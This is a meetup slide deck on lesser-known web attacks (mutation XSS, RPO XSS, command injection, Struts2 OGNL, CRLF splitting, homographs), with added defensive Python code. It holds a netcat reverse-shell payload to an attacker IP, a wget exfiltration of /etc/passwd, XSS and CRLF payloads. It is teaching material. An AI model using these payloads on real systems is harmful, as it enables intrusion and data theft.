Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Lesser Known WebApp Attacks
About me
Consultant at Aujas Networks
Part time bug hunter
Individual Security researcher
Blogger
http://infinite8security.blogspot.in
Menu Card
Cross site scripting –
Mutation XSS
RPO XSS
Zombie XSS
Remote Command Execution
CR-LF Attack
Homograph Attack
Cross site scripting - Mutation XSS
HTML encoded payload:
<listing>&lt;img src=1 onerror=alert(1)&gt;</listing>
As written, the payload is inert: the img tag is entity-encoded, so a server-side filter sees no live markup. We now read this element back through the innerHTML property:
<listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>
<script>alert(document.getElementById('x').innerHTML)</script>
When this code executes, the browser looks up the element with document.getElementById('x') and serializes its content through the innerHTML getter. In affected browsers the serializer returns the entity-decoded text of <listing>, so the string that comes back is <img src=1 onerror=alert(1)>. Written back into the page with innerHTML, that string is live markup. The extra level of decoding mutates the content from a safe to an unsafe state, without any attacker-controlled script running first.
Mitigation:
Server-side mitigation
• Avoid outputting content that the browser converts incorrectly: what must be checked is the browser's innerHTML serialization of the markup, not the raw string the server produced.
• Replace the flawed content with semantically equivalent content that the browser converts properly (for the example above, do not place entity-encoded markup inside <listing>).
Client-side mitigation
• Browsers should implement ECMAScript 5 and higher, so that the innerHTML property can be redefined and guarded from script.
• TrueHTML: a client-side library that relies on the XMLSerializer DOM object, provided by all user agents, to obtain a serialization that does not mutate.
• Details: https://cure53.de/fp170.pdf (the mXSS paper by Heiderich et al.)
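The mutation and the two mitigation ideas above, as an added example (not code from the slides or from the cure53 paper). There is no real DOM here: legacy_inner_html is a constructed model of the mutating serializer, decoding entities inside <listing> (and, by assumption, the similar legacy <xmp> and <plaintext> elements). naive_sanitize checks the raw string the way the vulnerable server does; hardened_sanitize checks what the browser will actually see and additionally requires the serialization to be a fixed point, which also catches a double-encoded payload that needs two rounds to become live.

```python
import html
import re

# Constructed model of the behaviour the mXSS paper describes: reading innerHTML
# of a legacy raw-text element returns the entity-DECODED text instead of
# re-escaping it.  xmp/plaintext are assumed to share the treatment.
RAW_TEXT_ELEMENTS = ("listing", "xmp", "plaintext")
_RAW_RE = re.compile(
    r"<(%s)(\s[^>]*)?>(.*?)</\1>" % "|".join(RAW_TEXT_ELEMENTS),
    re.IGNORECASE | re.DOTALL,
)

def legacy_inner_html(markup: str) -> str:
    """Model of the mutating innerHTML getter: entities inside raw-text
    elements come back decoded, everything else is returned unchanged."""
    def decode(m):
        tag, attrs, body = m.group(1), m.group(2) or "", m.group(3)
        return "<%s%s>%s</%s>" % (tag, attrs, html.unescape(body), tag)
    return _RAW_RE.sub(decode, markup)

# A live dangerous tag, or an event-handler attribute inside a real tag.
_LIVE_MARKUP = re.compile(
    r"<\s*(script|img|svg|iframe|object|embed)\b|<[^>]*\bon\w+\s*=",
    re.IGNORECASE | re.DOTALL,
)

def naive_sanitize(markup: str) -> bool:
    """Server-side check on the raw string only.  The entity-encoded payload
    contains no live tag, so it passes."""
    return _LIVE_MARKUP.search(markup) is None

def hardened_sanitize(markup: str, serialize=legacy_inner_html) -> bool:
    """Check what the browser will actually see.  Two conditions: serializing
    must be a fixed point (a second pass changes nothing, i.e. no further
    level of decoding is pending), and the serialized form must itself pass."""
    once = serialize(markup)
    if serialize(once) != once:
        return False            # not idempotent: content is still mutating
    return naive_sanitize(once)

# The slide's payload: looks inert as text, mutates into a live <img> tag.
PAYLOAD = "<listing>&lt;img src=1 onerror=alert(1)&gt;</listing>"

if __name__ == "__main__":
    print("naive sanitizer accepts payload:", naive_sanitize(PAYLOAD))
    print("after innerHTML round trip:     ", legacy_inner_html(PAYLOAD))
    print("hardened sanitizer accepts it:  ", hardened_sanitize(PAYLOAD))
```

The fixed-point test is the general form of the "semantically equivalent content" advice: content whose serialization is stable cannot mutate on a later innerHTML round trip.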
Cross site scripting - RPO XSS
Relative Path Overwrite XSS
• Difference between absolute and relative URLs
• Absolute URL: https://thehacker.co.in/test
• Relative URL: test/some_subdirectory (resolved by the browser against the directory of the page that references it)
To exploit this finding three things are necessary:
1) a stored injection point in the page body (the slide's "stored XSS") that lets the attacker plant CSS, so that the page can act as a style sheet when the browser loads it as one;
2) URL rewriting, so that the same page is also served when extra path segments are appended to its URL;
3) a relative (not root-relative) address for the CSS style sheet, so that appending path segments changes where the style sheet is loaded from.
DEMO
• Step 1: Let's visit www.webdevelopersnotes.com/graphics/index.php3
• To check for URL rewriting, add a trailing '/' to the path. If the same page comes back, a relative style sheet reference such as style.css now resolves under the rewritten path, i.e. to the page itself, and the browser parses the HTML (with the stored payload) as CSS.
• Open the rewritten URL with the XSS payload in IE and see the magic ;) This relies on the browser applying a style sheet served as text/html, which quirks-mode rendering and older IE versions do.
• http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php/
Mitigation:
• It is recommended that absolute URLs are used throughout a site.
• Otherwise root-relative URLs (starting with '/') should be used, because they do not depend on the path of the page that references them.
• A strict doctype (no quirks mode) and the X-Content-Type-Options: nosniff header also stop a text/html response from being applied as CSS.
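The URL-resolution step that RPO depends on, as an added example (not from the slides). PAGE is the demo target above; the href values, and the "x" filler segment used for deeper rewrites, are assumptions standing in for a page's <link rel="stylesheet"> and for attacker-chosen path segments. is_rpo_candidate goes one step beyond the demo: it also tries deeper rewrites, which is how an attacker defeats an href that starts with ../.

```python
from urllib.parse import urljoin, urlsplit

PAGE = "http://www.webdevelopersnotes.com/graphics/index.php3"   # the slide's demo target

def resolve(page_url: str, href: str) -> str:
    """Resolve a style sheet reference the way a browser does (RFC 3986):
    a relative href is resolved against the directory part of the page URL."""
    return urljoin(page_url, href)

def rewritten(page_url: str, depth: int = 1) -> str:
    """URL-rewriting probe: append path segments to the page URL.  depth=1 is
    the demo's trailing '/'; deeper variants ("index.php3/x/") defeat '../'."""
    return page_url.rstrip("/") + "/" + "x/" * (depth - 1)   # 'x' is arbitrary filler

def is_rpo_candidate(page_url: str, href: str, max_depth: int = 4) -> bool:
    """True when some rewritten variant of the page makes the style sheet
    reference resolve to a path *underneath the page itself*.  If the server
    serves the page for that path too, the browser loads the attacker-influenced
    HTML as CSS.  Absolute and root-relative hrefs never move, so they return False."""
    page = urlsplit(page_url)
    page_path = page.path.rstrip("/")
    for depth in range(1, max_depth + 1):
        target = urlsplit(resolve(rewritten(page_url, depth), href))
        if target.netloc == page.netloc and target.path.startswith(page_path + "/"):
            return True
    return False

def rpo_exposed_links(page_url: str, hrefs):
    """Filter a page's style sheet hrefs down to the ones RPO can hijack."""
    return [h for h in hrefs if is_rpo_candidate(page_url, h)]

if __name__ == "__main__":
    for href in ("style.css", "./style.css", "../site.css",
                 "/graphics/style.css", "https://static.example/style.css"):
        print("%-34s -> %s  RPO: %s" % (href, resolve(rewritten(PAGE), href),
                                        is_rpo_candidate(PAGE, href)))
```

Only the first three hrefs are exposed; the root-relative and absolute forms resolve to the same resource regardless of how the page URL is rewritten, which is exactly the mitigation above.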
Remote/OS Command Execution
Example payload for a parameter whose value the server passes to a shell: the legitimate value, followed by a chained netcat reverse shell to the attacker's listener.
www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash
Now what if ';' is blocked by the application? Other separators do the same job:
X ; Y = separator (run X and then Y, regardless of the success of X)
X | Y = pipe (run X and pass its output to Y)
X ^ Y = caret: the cmd.exe escape character, used to break up filtered keywords (wh^oami) rather than to chain commands
X && Y = AND (run Y only if X succeeded)
FAIL || Y = OR (run Y only if X failed)
X %0D Y %0D Z = newline separators (URL-encoded carriage return; %0A for line feed), each starting a new command
` X ` = backtick command substitution (X is executed and its output substituted in place)
X & Y = background (run X in the background and Y immediately, regardless of the success of X)
$( X ) = command substitution, same effect as backticks
nc -e /bin/sh = netcat reverse shell
wget --post-file /etc/passwd = exfiltrate a file to the attacker's server with an HTTP POST from wget
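The injection mechanics behind the table above, as an added example (not from the slides). A "host lookup" feature hands user input to a shell; echo stands in for the real ping or nslookup so that the example runs offline, and the INJECTED marker stands in for the netcat payload. The vulnerable and fixed variants, the denylist of separators and the allowlist host-name check are all constructed for this example.

```python
import re
import subprocess

def lookup_vulnerable(host: str) -> str:
    """String concatenation + shell=True: every separator in the table is live."""
    return subprocess.run("echo host=" + host, shell=True,
                          capture_output=True, text=True).stdout

def lookup_fixed(host: str) -> str:
    """Argument vector, no shell: the whole input is one argv element and is
    never parsed for separators, quotes or substitutions."""
    return subprocess.run(["echo", "host=" + host],
                          capture_output=True, text=True).stdout

# Separators from the table, as they arrive after URL decoding (%0d -> \r,
# %0a -> \n).  '^' is deliberately absent: it is cmd.exe's escape character,
# not a chaining operator.
SHELL_SEPARATORS = re.compile(r"[;&|`\r\n]|\$\(")

def contains_shell_separator(value: str) -> bool:
    """Denylist check: fine for detection and logging, too fragile as the only defence."""
    return SHELL_SEPARATORS.search(value) is not None

# Allowlist: what a host name may look like (assumed policy for this example).
HOSTNAME = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$")

def is_valid_hostname(value: str) -> bool:
    return HOSTNAME.match(value) is not None

def lookup_hardened(host: str) -> str:
    """Allowlist validation first, then argv execution: belt and braces."""
    if not is_valid_hostname(host):
        raise ValueError("invalid host name")
    return lookup_fixed(host)

if __name__ == "__main__":
    evil = "www.nsa.gov && echo INJECTED"
    print(repr(lookup_vulnerable(evil)))   # two commands ran
    print(repr(lookup_fixed(evil)))        # one command, literal argument
```

Note that the newline variant (what %0a becomes after decoding) is just as effective as ';' against the vulnerable version, which is why filtering one separator buys nothing.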
RCE never dies!!!
• Request parameters whose names start with "action:", "redirect:" or "redirectAction:" are not properly sanitized.
• Their content is evaluated as an OGNL (Object-Graph Navigation Language) expression against the value stack, which lets an attacker inject server-side code.
Apache Struts2 RCE (Struts advisory S2-016, CVE-2013-2251). A harmless probe: if the arithmetic is evaluated, the expression is reaching OGNL.
http://host/struts2-blank/example/X.action?action:${3*4}
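Detection logic for the prefix injection above, as an added example (not from the slides): it scans access-log request lines for the three Struts prefixes and flags those whose parameter carries OGNL expression syntax. The log lines are constructed, not real traffic; the third mirrors the slide's ?action:${3*4} probe and the fourth shows the same thing percent-encoded. The prefix lives in the parameter name and the probe usually has no '=' at all, so parsing has to keep blank values.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (common log format) for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [14/May/2016:10:01:02 +0530] "GET /struts2-blank/example/HelloWorld.action HTTP/1.1" 200 1043
10.0.0.5 - - [14/May/2016:10:01:07 +0530] "GET /struts2-blank/example/X.action?redirect:/index.jsp HTTP/1.1" 302 0
10.0.0.9 - - [14/May/2016:10:02:11 +0530] "GET /struts2-blank/example/X.action?action:${3*4} HTTP/1.1" 200 512
10.0.0.9 - - [14/May/2016:10:02:15 +0530] "GET /struts2-blank/example/X.action?redirect:%24%7B%233*4%7D HTTP/1.1" 302 0
"""

PREFIXES = ("action:", "redirect:", "redirectAction:")
OGNL_MARKER = re.compile(r"[$%]\{")          # ${...} / %{...} expression syntax
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def prefixed_params(url: str):
    """Yield (name, value) pairs whose name starts with a Struts prefix.
    parse_qsl percent-decodes for us; keep_blank_values returns a bare
    'action:${3*4}' as a name with an empty value instead of dropping it."""
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name.startswith(PREFIXES):
            yield name, value

def is_ognl_probe(url: str) -> bool:
    """True when a prefixed parameter carries expression syntax in name or value.
    A plain 'redirect:/index.jsp' is legitimate Struts usage and is not flagged."""
    return any(OGNL_MARKER.search(name + value) for name, value in prefixed_params(url))

def scan_log(log: str):
    """Return the request URLs in an access log that look like S2-016 probes."""
    hits = []
    for line in log.splitlines():
        m = REQUEST_LINE.search(line)
        if m and is_ognl_probe(m.group(1)):
            hits.append(m.group(1))
    return hits

if __name__ == "__main__":
    for url in scan_log(SAMPLE_LOG):
        print("OGNL injection attempt:", url)
```

Matching on the prefix rather than on "${" alone keeps the false-positive rate down: expression syntax in an ordinary parameter is not evaluated by this code path, while any expression behind one of the three prefixes is.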
Divide and Conquer: CR-LF Attack
• CR stands for Carriage Return (ASCII 13, \r)
• LF stands for Line Feed (ASCII 10, \n)
How does this attack work?
The server script embeds user data in HTTP response headers without removing CR and LF characters. Since CRLF is what separates headers from each other and from the body, the attacker can terminate the intended header and supply headers, or an entire second response, of their own.
Example: Step 1: There is a redirection page "redir_lang.jsp". When we hit it, the server redirects to the language-specific page using the lang parameter taken straight from the request:
<% response.sendRedirect("/by_lang.jsp?lang="+
request.getParameter("lang")); %>
Step 2: A normal request, /redir_lang.jsp?lang=English, gets a 302 whose Location header is /by_lang.jsp?lang=English.
Let's attack ;)
Step 3: Instead of passing the value English, we pass the attack vector shown below.
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
Note: the CRLF sequences are URL encoded (%0d%0a), as are the spaces (%20); the container decodes them before the script concatenates the value into the header.
Let's see what the server responds with.
The server emits a single byte stream that a client reads as:
1) A first HTTP response, which is a 302 (redirection) response. Its Location header ends at foobar, and the injected Content-Length: 0 plus the blank line close it.
2) A second HTTP response, which is a 200 response with a body of 19 bytes of HTML (<html>Shazam</html>), entirely attacker-controlled.
3) Superfluous data: the remainder of the server's original response (whatever followed the Location header), which the client discards.
So when the attacker feeds the target (typically a caching proxy sitting between the attacker and the server) with two requests over the same connection, the first to the URL
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
and the second to the URL /index.html,
the target believes that the first request is matched to the first response, and that the second request (to /index.html) is matched to the second, attacker-supplied response. If the target caches, it now serves the attacker's page for /index.html to everyone.
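The splitting above, as an added example (not from the slides): a constructed model of redir_lang.jsp that builds the 302 by string concatenation, a fixed version that encodes the parameter for its context, and a small parser that reads the resulting bytes the way a keep-alive client or proxy does. The extra Content-Type and Content-Length headers in the model are assumptions standing in for whatever the real container appends; they are what ends up as "superfluous data".

```python
from urllib.parse import quote, unquote

def vulnerable_redirect(lang: str) -> bytes:
    """response.sendRedirect("/by_lang.jsp?lang=" + lang) with no filtering:
    CR/LF inside lang terminate the Location header."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: /by_lang.jsp?lang=" + lang + "\r\n"
            "Content-Type: text/html\r\n"          # assumed container headers
            "Content-Length: 0\r\n"
            "\r\n").encode("latin-1")

def safe_redirect(lang: str) -> bytes:
    """Fix: encode the value for the context it lands in (a URL inside a header),
    so CR and LF become %0D%0A and cannot start a new header or message."""
    encoded = quote(lang, safe="")
    assert "\r" not in encoded and "\n" not in encoded
    return ("HTTP/1.1 302 Found\r\n"
            "Location: /by_lang.jsp?lang=" + encoded + "\r\n"
            "Content-Type: text/html\r\n"
            "Content-Length: 0\r\n"
            "\r\n").encode("latin-1")

def split_responses(raw: bytes):
    """Read a byte stream like a keep-alive client: status line, headers, blank
    line, then Content-Length bytes of body; repeat while another status line
    follows.  Returns ([(status, headers, body), ...], leftover_bytes)."""
    messages = []
    rest = raw
    while rest.startswith(b"HTTP/"):
        head, sep, tail = rest.partition(b"\r\n\r\n")
        if not sep:
            break                                   # incomplete message
        lines = head.decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body, rest = tail[:length], tail[length:]
        messages.append((lines[0], headers, body))
    return messages, rest

# The slide's attack vector, URL-encoded as it travels in the query string.
PAYLOAD = ("foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
           "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
           "Content-Length:%2019%0d%0a%0d%0a<html>Shazam</html>")

def attack(builder=vulnerable_redirect):
    """The container URL-decodes the parameter before the script sees it."""
    return split_responses(builder(unquote(PAYLOAD)))

if __name__ == "__main__":
    msgs, leftover = attack()
    for status, headers, body in msgs:
        print(status, headers, body)
    print("superfluous bytes:", leftover)
```

Run against vulnerable_redirect the parser returns two messages plus leftover bytes; against safe_redirect it returns one message and nothing left over, because the whole payload is now a single, harmless Location value.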
What can an attacker do with a CRLF attack?
Cross site scripting >> http://blog.innerht.ml/twitter-crlf-injection
Web cache poisoning (defacement)
Cross-user attacks (single user, single page, temporary defacement)
Hijacking pages with user-specific information
Browser cache poisoning
Homograph Attack
Can you tell the difference?
1) https://ebаy.com/
2) https://ebay.com/
What is this all about? http://ebаy.com/
Encoding the host name as punycode (IDNA), which is what actually goes to DNS, gives:
http://xn--eby-7cd.com/
The 'а' in the first URL is a Cyrillic letter (U+0430), not the Latin 'a' (U+0061). In most fonts the two are indistinguishable, but they are different domain names.
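The punycode conversion and two checks a registrar, mail gateway or browser can apply, as an added example (not from the slides). The Cyrillic 'а' (U+0430) is the one from the slide; the confusable table is a small hand-picked subset, an assumption for this example rather than the complete Unicode TR39 mapping.

```python
import unicodedata

# Look-alikes mapped to their Latin counterparts (subset, assumed for this example).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0455": "s", "\u0456": "i", "\u0458": "j",
}

def to_ascii(host: str) -> str:
    """IDNA/punycode form of a host name: the labels DNS actually resolves."""
    return host.encode("idna").decode("ascii")

def scripts(label: str) -> set:
    """Scripts used by the letters of one label, read off the Unicode character
    names (LATIN SMALL LETTER E, CYRILLIC SMALL LETTER A, ...).  Digits and
    hyphens carry no script and are ignored."""
    found = set()
    for ch in label:
        if ch.isalpha():
            found.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return found

def is_mixed_script(host: str) -> bool:
    """A label mixing scripts (Latin + Cyrillic here) is the classic homograph tell;
    a purely Cyrillic label is legitimate and passes this check."""
    return any(len(scripts(label)) > 1 for label in host.split("."))

def skeleton(host: str) -> str:
    """Map confusable characters to their Latin look-alikes so two host names
    that render the same compare equal."""
    return "".join(CONFUSABLES.get(c, c) for c in host)

def looks_like(host: str, trusted: str) -> bool:
    """True when host is not the trusted name but is visually indistinguishable from it."""
    return host != trusted and skeleton(host) == skeleton(trusted)

if __name__ == "__main__":
    spoof = "eb\u0430y.com"        # the slide's host name, Cyrillic a in position 3
    print(spoof, "->", to_ascii(spoof))
    print("mixed script:", is_mixed_script(spoof))
    print("looks like ebay.com:", looks_like(spoof, "ebay.com"))
```

The mixed-script check is cheap and catches this case, but it is not sufficient on its own: a label written entirely in Cyrillic look-alikes (for example one built only from а, е, о, р, с, х, у) is single-script and needs the skeleton comparison against the names being protected.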
What can an attacker do with a homograph attack?
Phishing
Unvalidated redirection
Fake websites
An attacker may combine this with SSL attacks:
http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf
Thank You
Reach me @
LinkedIn: Ninad Sarang
Twitter: @hbkninad